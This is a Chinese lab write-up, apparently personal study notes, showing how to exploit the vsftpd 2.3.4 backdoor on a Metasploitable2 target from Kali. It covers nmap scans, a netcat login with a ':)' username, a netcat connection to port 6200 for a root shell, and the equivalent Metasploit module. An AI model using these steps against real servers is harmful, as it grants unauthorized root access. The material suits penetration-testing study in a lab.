kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞)
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密
此博客为本人学习笔记,如有错误,还请指正。
#vsftpd源码包含后门漏洞
#思路:开放21端口,并且vsftpd版本号为2.3.4
#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。
实验环境
攻击机:kali :192.168.111.128
靶机:Metasploitable2-Linux:192.168.111.132
Metasploitable 的用户名和密码均为:msfadmin
一、直接在kali终端利用漏洞
1、先测试kali与靶机的连通性
2、在kali 终端下对靶机ip地址进行扫描,查看端口情况,发现21端口是打开的
nmap 192.168.111.132
3、继续扫描该端口版本,发现是含有笑脸漏洞的vsftpd版本。
nmap -p 21 192.168.111.132 -sV
4、攻击前我们先查看6200端口情况(此时端口是关闭的)
nmap -p 6200 192.168.111.132
5、连接21端口并通过笑脸漏洞登录
nc 192.168.111.132 21
user 任意用户名(以“:)”结尾即可)
pass 任意密码
6、重新打开一个终端,查看6200端口情况,发现已经打开
nmap -p 6200 192.168.111.132
7、在控制台连接6200端口,获得shell,输入whoami,发现是root权限(要在6200端口打开的情况下才能连接成功)
nc 192.168.111.132 6200
二、用msfconsole利用漏洞
1、打开终端,进入msfconsole
2、利用search命令查找我们需要的漏洞模块vsftpd(笑脸漏洞)
search vsftpd
3、使用漏洞,输入命令
use exploit/unix/ftp/vsftpd_234_backdoor
或者
use 0
4、查看需要设置的参数
5、只需设置目标主机的IP即可
6、设置好后便可以开始执行攻击exploit
7、获得靶机shell
参考链接:https://blog.csdn.net/qq_51650968/article/details/121129326
如有侵权,请联系删除。
更多推荐
所有评论(0)